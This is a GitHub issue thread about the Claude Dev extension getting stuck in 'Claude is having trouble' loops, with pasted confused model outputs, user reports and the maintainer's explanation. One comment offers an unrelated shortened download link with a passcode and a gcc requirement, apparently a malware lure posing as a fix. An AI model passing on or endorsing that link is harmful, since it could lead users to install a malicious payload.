### ISSUE TITLE
Claude is having trouble

### ISSUE THREAD

**Issue by samuk10** [saoudrizwan/claude-dev#227]
### Steps to reproduce:
create new folder, start vscode
setup claude dev
ask for:  `create a todo app using html, css, js.`

#### API Request Complete

> This output appears to be a JSON representation of an API documentation in Markdown format, describing various functions associated with a tool named "Claude".
> 
> The content suggests that Claude is designed for file and directory operations on Linux-based systems. It includes functions for listing files and directories, including code definition names, as well as searching for patterns within files using regular expressions.
> 
> Several specific functions mentioned include:
> 
> 1. _ls_files_: Lists files and directories at a specified path with an optional recursive search.
> 2. _list_code_definition_names_: Retrieves the top-level source code class, function, or method construct names used in a defined directory.
> 3. _search_files_: Searches a given directory for pattern occurrences across file contents using Rust regex syntax rules.
> 4. _read_file_: Reads and returns raw text content from an existing file, including PDF and DOCX files' automatic extraction features.
> 5. _write_to_file_: Overwrites content into a desired location by either overwriting the specified file if it exists or creating one when not.
> 
> Functions also include interactive communication with the user through functions like:
> 
> 1. _ask_followup_question_: Allows the user to provide further clarification on an issue or question that arose during processing.
> 2. _attempt_completion_: Used for finalizing tasks, displaying results in various formats (e.g., live web browsers), and providing real-time feedback from users regarding their satisfaction with outcomes.
> 
> By examining this output you could understand how Claude handles typical file related tasks such as searching, reading, writing files in a well-structured manner while maintaining interactive communication to improve its features.

#### API Request Complete

> Based on the provided text, I will follow the suggested steps:
> 
> Since we have completed the user's task, we will use the attempt_completion tool.
> 
> - Attempt completion by presenting the result to the user and giving them feedback (if needed). No further action is required from me in this step, based on the provided instructions.

#### API Request Complete

> Based on the provided code snippet, the correct action to take is:
> 
> Proceed with the next step of the task.
> 
> The code has already identified that you have completed the user's task and does not need additional information from them. Therefore, there's no need to use the attempt_completion or ask_followup_question tools. You can simply move on with whatever comes next in the task at hand.

> Claude is having trouble...
> This may indicate a failure in his thought process or inability to use a tool properly, which can be mitigated with some user guidance (e.g. "let's try breaking this large file down into smaller files").

### System:
Linux Kubuntu 24.04
ollama3.1
Claude dev: v1.5.27

**Comment by sanketkorde** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by samuk10** [comment]
I asked what was my input and this was the answer:

```
API Request Complete

It seems like the user wants you to perform some data processing or text manipulation. They're having trouble proceeding because they need your assistance to write out their raw input.

To better assist, I'll create a container for that raw input. Please provide it within a formatted way, preferably in the following structure:

Text content
API Request Complete

The attempt_completion tool should be used once you've completed the task, and the ask_followup_question tool should be used if you require additional information from the user. Proceed with the next step of the task since neither condition is met.

API Request Complete

Based on the provided documentation, here's how you would proceed:

Since you've completed the task, use the attempt_completion tool.

However, please note that there seems to be some mistake in the explanation regarding using ask_followup_question or proceeding with the next step. The correct usage of these tools is not described in this snippet, and we cannot assume additional context which was cut off from the original text.

So, given the current information provided:

Use attempt_completion tool.

Claude is having trouble...
This may indicate a failure in his thought process or inability to use a tool properly, which can be mitigated with some user guidance (e.g. "let's try breaking this large file down into smaller files").
```

**Comment by supersaiyan2019** [comment]
I encountered the same problem...

System:
Windows 11
ollama3.1/mistral-nemo

Claude dev: v1.5.31
![error](https://github.com/user-attachments/assets/8be78f3c-e41f-4e6b-a1e7-7cb4f31f5819)

**Comment by rompaul** [comment]
Same issue with win11

**Comment by hyx-fries** [comment]
I also encountered the same problem. After testing, this problem will occur when using claude-3-5-sonnet-20240620. But there is no problem with using gpt-4o-2024-08-06.
System:
Mac Sonoma 14.5 (23F79)
claude-3-5-sonnet-20240620
Claude dev: v1.5.34

**Comment by lustfeind** [comment]
Same problem here.
Mac Sonoma 14.6
Ollama, Mistral-Nemo

**Comment by simcrq** [comment]
Same problem here.
Mac Sonoma 14.6.1
Claude 3.5 sonnet

**Comment by SippinOnJuiceBox** [comment]
Same problem here.
Mac Sonoma 14.6
Claude 3.5 sonnet

**Comment by zhoudan0928** [comment]
有可能是由于部分中转api与claude dev不兼容导致的问题,目前我找到的能兼容的第三方api能解决这个问题的只有grop,如果出现这个问题可以去使用试一下

**Comment by saoudrizwan** [comment]
Claude Dev doesnt work great with most local models unfortunately. I originally made the extension to only work with claude 3.5 sonnet since that was the only model i found reliable enough to do both tool calling and autonomous loop prompts–even asking other large models like mistral didnt work out great. So it's expected local quantized models wont work the best, but ive found most success with llama3.1 70b although it struggles if you dont give it a clear and specific prompt. Hopefully local models keep getting the same attention and we have claude 3.5 sonnet level models on ollama in a few years. For now not much I can do about this though, I am sorry.

For anybody facing 'claude is having trouble' with claude 3.5 sonnet, this likely happens when he's trying to edit large files. I suggest breaking your file up into smaller files, or asking him to truncate unchanged code with "//rest of code here", so you can revert those yourself (see https://github.com/saoudrizwan/claude-dev/wiki/Troubleshooting-%E2%80%90-Claude-Deleting-Code-with-%22rest-of-code-here%22-Comments)
